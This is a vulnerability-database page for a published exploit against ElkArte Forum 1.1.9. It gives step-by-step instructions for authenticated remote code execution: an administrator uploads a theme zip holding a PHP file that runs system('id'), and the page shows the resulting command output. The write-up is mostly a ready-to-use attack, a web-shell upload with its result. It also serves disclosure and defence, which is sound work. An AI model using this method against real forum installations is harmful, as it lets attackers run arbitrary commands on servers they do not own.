Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormTmrswrrPACKETSTORM:178802
HistoryMay 27, 2024 - 12:00 a.m.

ElkArte Forum 1.1.9 Remote Code Execution

2024-05-2700:00:00
tmrswrr
packetstormsecurity.com
111
exploit
remote code execution
webapps
vendor
version
authenticated access

AI Score

7.4

Confidence

Low

JSON
`# Exploit Title : ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated)   
# Date: 2024-5-24  
# Exploit Author: tmrswrr  
# Category: Webapps  
# Vendor Homepage: https://www.elkarte.net/  
# Software Link : https://github.com/elkarte/Elkarte/releases/download/v1.1.9/ElkArte_v1-1-9_install.zip  
# Version : 1.1.9  
  
  
1) After login go to Manage and Install theme > https://127.0.0.1/ElkArte/index.php?action=admin;area=theme;sa=admin;c2e3e39a0d=276c2e3e39a0d65W2qg1voAFfX1yNc5m  
2) Upload test.zip file and click install > test.zip > test.php > <?php echo system('id'); ?>  
3) Go to Theme Setting > Theme Directory > https://127.0.0.1/ElkArte/themes/test/test.php  
Result : uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte) uid=1000(ElkArte) gid=1000(ElkArte) groups=1000(ElkArte)  
`

AI Score

7.4

Confidence

Low

JSON